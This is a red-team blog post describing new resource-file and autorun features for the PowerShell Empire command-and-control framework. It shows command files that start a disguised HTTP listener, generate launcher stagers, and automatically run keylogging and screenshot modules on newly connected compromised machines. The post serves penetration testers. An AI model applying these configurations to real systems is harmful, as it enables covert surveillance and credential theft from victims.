Empire Resource Files and Auto Runs

Carrie Roberts* //

ADVISORY: The techniques and tools referenced within this blog post may be outdated and do not apply to current situations. However, there is still potential for this blog entry to be used as an opportunity to learn and to possibly update or integrate into modern tools and techniques.

I have added resource file and autorun functionality to PowerShell Empire. Empire now has the ability to run multiple commands at once by specifying the commands in a resource file. You can use this feature to automate the startup of your listeners and perform other tasks. In addition, you can specify multiple commands to run automatically on any new agents that connect using the new autorun feature.

Consider the following resource file containing the Empire commands used to startup our go-to listener named http443 on port 443. In this example, the file is called http443.rc and is located in the root directory.


uselistener http

set Name http443

set DefaultProfile /admin/login.php,/console/dashboard.asp,/news/today.jsp| Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0);

set Host

set Port 443


To run all these commands at once within Empire simply use the newly added “resource” command as shown below.

Wow, that was easy, one command and everything is started with our custom settings!

Here is another example resource file to generate the OS X and Windows launch commands for our new listener.


usestager osx/launcher

set Listener http443



usestager multi/launcher

set Listener http443


The image above shows the output from running the launchers.rc resource file. The beginning of the Python launcher is shown at the bottom (echo “import sys . . .). The Powershell one-liner was also output but not shown in the image for brevity.

Now let’s have a look at the “autorun” command that I added to the agent’s menu. With the autorun command, you can specify a resource file to execute automatically when a new agent connects to your listener. When you set the autorun, you specify which agent language the commands should be run on (e.g. Python or PowerShell). Consider that we have the following in the resource file /root/autorun-py.rc:

usemodule trollsploit/osx/say

set Text Supercalifragilisticexpialidocious


This file is intended to execute on a Python agent (OS X) and to speak the text “Supercalifragilisticexpialidocious” using the computer text-to-speech functionality.

Next, we have a resource file specifying three modules to run on any PowerShell agents that connect (/root/autorun-ps.rc):

usemodule collection/keylogger



usemodule collection/screenshot



usemodule trollsploit/voicetroll

set VoiceText Booya


The resource file above contains commands to start keylogging, take a screenshot, and say the text “Booya”. The following commands will set the autorun for any Python and PowerShell agents.

To see what commands have been set for each language, use the “autorun show” command, optionally specifying the language.

Okay, now we have told Empire to execute the autorun-py commands automatically whenever a new Python agent connects and run the autorun-ps commands whenever a new PowerShell agent connects. To clear the autorun setting, use the “autorun clear” command. The first command below clears only the Python autorun commands, while the second command clears autorun commands for all languages.

We have demonstrated a lot of cool things, but let’s roll all this functionality up into a single resource file that does it all (/root/doitall.rc):

# Start my port 80 http listener

resource /root/http80.rc

# Start my port 443 http listener

resource /root/http443.rc

# set my autorun scripts

resource /root/autoruns.rc

# return to the main menu


This resource file calls other resource files such as the http443.rc file demonstrated at the beginning of this post. It also starts up a similar listener on port 80 and sets our autoruns using the autoruns.rc file shown below.


autorun /root/autorun-py.rc python

autorun /root/autorun-ps.rc powershell

Note that in the doitall.rc file, descriptive comments are included. Any line that starts with # is considered a comment and ignored by Empire.

We could run our doitall.rc file from within Empire using the resource command, or we can specify it on the command line when starting Empire with the “–resource” parameter.

Awesome, we started up listeners with custom settings and set our autoruns all with a single command! Very nice! Here is a video walkthrough of everything discussed in this post.

To use this new feature, grab the Empire code from https://github.com/EmpireProject/Empire. Until these features are merged into a release or the Master branch you’ll have to check out the dev branch to use these features. I hope you enjoy this new functionality as much as I do, it definitely removes a large pain point when using Empire and makes way for a high degree of automation. ________   *Though Carrie no longer works for BHIS, she remains our good friend and loyal guest post contributor! You can follow her on Twitter.

You can learn more from Carrie in her classes!

Check them out here:

Attack Emulation Tools: Atomic Red Team, CALDERA and More 

PowerShell for InfoSec

Available live/virtual and on-demand!